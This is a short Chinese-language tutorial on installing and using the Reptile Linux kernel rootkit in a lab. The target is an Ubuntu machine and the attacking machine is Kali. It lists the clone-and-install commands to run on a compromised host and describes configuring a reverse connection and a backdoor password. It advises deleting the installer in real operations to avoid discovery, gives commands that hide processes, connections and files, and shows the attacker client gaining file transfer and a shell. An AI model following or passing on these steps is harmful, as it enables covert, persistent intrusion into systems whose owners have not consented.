## 項目地址
https://github.com/f0rb1dd3n/Reptile
## 安裝
apt-get install linux-headers-$(uname -r)
git clone https://github.com/f0rb1dd3n/Reptile.git
cd Reptile
./setup.sh install
## 卸載
./setup.sh remove
這里來說明一下,安裝和卸載都是在滲透目標機器上進行的,需要交互式 shell。下面我以 ubuntu 作為滲透測試目標 kali 作為攻擊機器來演示一下如何使用。
### on vulnerable ubuntu(192.168.5.148)
和 msf 生成木馬比較類似 Reverse IP 是 kali 的 ip,Reverse Port 是 反彈到 kali 的端口,SRC port 是本地接收數據包的端口 Backdoor password 是我們后門的密碼。最后提示是否刪除這個項目,實戰下肯定是要刪除的,因為這個客戶端和服務端安裝都是一個 setup.sh 被發現會被卸載掉,這里我自己的機器就不刪了。
看下 rootkit 效果,沒有進程,沒有連接。
隱藏進程: /reptile/reptile_cmd hide <pid>
顯示進程: /reptile/reptile_cmd show <pid>
隱藏udp: /reptile/reptile_cmd udp <IP> <port> hide
顯示udp: /reptile/reptile_cmd udp <IP> <port> show
隱藏tcp: /reptile/reptile_cmd tcp <IP> <port> hide
顯示tcp: /reptile/reptile_cmd tcp <IP> <port> show
還可以隱藏文件 所有包含 reptile 這個字符的文件會被隱藏,這個字符可以在配置文件中修改。
### on attacker kali(192.168.5.149)
## 安裝控制端
./setup.sh client
安裝好以后配置相關參數
這是候已經連接上了,可以看到可以上傳下載和獲得一個 shell